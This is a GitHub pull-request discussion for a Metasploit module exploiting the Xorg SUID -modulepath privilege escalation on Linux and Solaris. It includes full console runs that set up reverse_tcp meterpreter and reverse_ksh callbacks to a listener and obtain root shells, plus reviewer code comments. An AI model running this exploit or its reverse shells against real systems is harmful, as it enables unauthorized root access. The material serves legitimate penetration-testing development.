Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We鈥檒l occasionally send you account related emails.

Already on GitHub? Sign in to your account

WIP Xorg x11 suid server modulepath #11025

Merged
merged 6 commits into from Oct 22, 2019

Conversation

@aringo
Copy link
Contributor

aringo commented Nov 26, 2018

Using this version of the exploit there is no need to overwrite crontab, works against Selinux, and is near instant. I had some difficulties getting this to work on OpenBSD. Should I try to update the other one to use this method for Linux? Kind of burnt out on this exploit now so WIP 馃挴

  • Start msfconsole
  • get session
  • exploit/multi/local/xorg_x11_suid_server_modulepath
Module options (exploit/multi/local/xorg_x11_suid_server_modulepath):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.30.0.2       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux x64


msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.30.0.2:4444 
[*] Running additional check for Linux
[+] Console lock for peep
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.5 is vulnerable
[+] Xorg does not appear running
[+] gcc is installed
[+] Passed all initial checks for exploit
[*] Writing launcher
[*] Max line length is 65537
[*] Writing 145 bytes in 1 chunks of 524 bytes (octal-encoded), using printf
[*] compiling launcher
[*] Uploading your payload, this could take a while
[*] Max line length is 65537
[*] Writing 249 bytes in 1 chunks of 728 bytes (octal-encoded), using printf
[*] Exploiting
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (816260 bytes) to 172.30.0.61
[*] Meterpreter session 2 opened (172.30.0.2:4444 -> 172.30.0.61:55866) at 2018-11-25 19:31:39 -0600
[+] Deleted /tmp/CmduZk.c
[+] Deleted /tmp/libglx.so
[+] Deleted /tmp/.session-k0KBlQ1xT

meterpreter > shell 
Process 2299 created.
Channel 1 created.
id ; uname -a ; sestatus
uid=0(root) gid=0(root) groups=0(root),1000(peep) context=unconfined_u:unconfined_r:xserver_t:s0-s0:c0.c1023
Linux localhost.localdomain 3.10.0-862.el7.x86_64 #1 SMP Fri Apr 20 16:44:24 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
SELinux status:                 enabled
SELinuxfs mount:                /sys/fs/selinux
SELinux root directory:         /etc/selinux
Loaded policy name:             targeted
Current mode:                   enforcing
Mode from config file:          error (Inappropriate ioctl for device)
Policy MLS status:              enabled
Policy deny_unknown status:     allowed
Max kernel policy version:      31
@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Nov 26, 2018


# linux checks
uname = cmd_exec "uname"
if uname =~ /linux/i

This comment has been minimized.

Copy link
@bcoles

bcoles Nov 26, 2018

Contributor

This isn't necessary if you're only targeting Linux.

This comment has been minimized.

Copy link
@aringo

aringo Nov 27, 2018

Author Contributor

This technique works on Solaris also, I'll open it up. It does not work on OpenBSD though.

xdisplay = datastore['Xdisplay']
sofile = "#{modulepath}/#{datastore['sofile']}"

stub = %Q^

This comment has been minimized.

Copy link
@bcoles

bcoles Nov 26, 2018

Contributor

For Linux, you could use Metasm to dynamically compile the shared object, rather than relying on gcc to be on the box. Here's an example.

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Apr 21, 2019

Any luck with adding support for Solaris ? There's a few examples of dealing with Solaris' insane $PATH issues for gcc and compiling a shared object in the exploits/solaris/local directory. Alternatively, I can take a look at implementing gcc for Solaris if you like.

Perhaps it would be better to get this landed and circle back later.

Should I try to update the other one to use this method for Linux?

I think it makes sense to keep the two vectors separate. Partly because they're exploited differently, but mostly because the module logic is already complex enough as a multi module.

@space-r7 space-r7 self-assigned this Oct 15, 2019
@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Oct 21, 2019

Hi @aringo! Do you mind if I try adding a Solaris target to your module? Thanks!

space-r7 added 3 commits Oct 21, 2019
@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Oct 22, 2019

In the interest of getting this landed soon, I added support for Metasm, Solaris targets, and documentation.

@space-r7 space-r7 added docs and removed needs-docs labels Oct 22, 2019
@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Oct 22, 2019

Testing on Centos 7.4:

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[*] Sending stage (816260 bytes) to 172.16.215.159
[*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.159:33178) at 2019-10-22 13:48:01 -0500

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath 
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 1
session => 1
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > check
[+]  The target is vulnerable.
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[+] Passed all initial checks for exploit
[*] Writing launcher and compiling
[*] Uploading your payload, this could take a while
[*] Exploiting
[*] Sending stage (816260 bytes) to 172.16.215.159
[*] Meterpreter session 2 opened (172.16.215.1:4444 -> 172.16.215.159:33180) at 2019-10-22 13:48:51 -0500
[+] Deleted /tmp/libglx.so
[+] Deleted /tmp/.session-qwQLbME

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

Testing on Solaris 11.4:

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_ksh
payload => cmd/unix/reverse_ksh
msf5 exploit(multi/handler) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[*] Command shell session 1 opened (172.16.215.1:4444 -> 172.16.215.159:33616) at 2019-10-22 14:06:33 -0500
[*] Command shell session 2 opened (172.16.215.1:4444 -> 172.16.215.152:39838) at 2019-10-22 14:06:33 -0500

whoami
space
id 
uid=100(space) gid=10(staff)
uname -a
SunOS solaris 5.11 11.4.0.15.0 i86pc i386 i86pc
background

Background session 2? [y/N]  y
msf5 exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath 
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set target 2
target => 2
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 2
session => 2
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload cmd/unix/reverse_ksh
payload => cmd/unix/reverse_ksh
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > check

[!] SESSION may not be compatible with this module.
[+]  The target is vulnerable.
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.215.1:4444 
[+] Passed all initial checks for exploit
[*] Writing launcher and compiling
[*] Uploading your payload, this could take a while
[*] Exploiting
[*] Command shell session 3 opened (172.16.215.1:4444 -> 172.16.215.152:45033) at 2019-10-22 14:07:37 -0500
[+] Deleted /tmp/DhNrDYvoir.c
[+] Deleted /tmp/libglx.so
[+] Deleted /tmp/.session-ZnrESw

id
uid=0(root) gid=0(root)
uname -a
SunOS solaris 5.11 11.4.0.15.0 i86pc i386 i86pc
space-r7 added a commit that referenced this pull request Oct 22, 2019
@space-r7 space-r7 merged commit 1ceaa1d into rapid7:master Oct 22, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
msjenkins-r7 added a commit that referenced this pull request Oct 22, 2019
@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Oct 22, 2019

Release Notes

This exploits a local privilege escalation vulnerability on targets running Xorg server versions from v1.19.0 to versions below v1.20.3. Vulnerable versions of Xorg have the SUID bit set and allow low-privileged users to start the server with the -modulepath flag. This allows a user to load and execute a shared object as root.

@bcoles bcoles added rn-modules and removed delayed labels Oct 24, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
3 participants
You can鈥檛 perform that action at this time.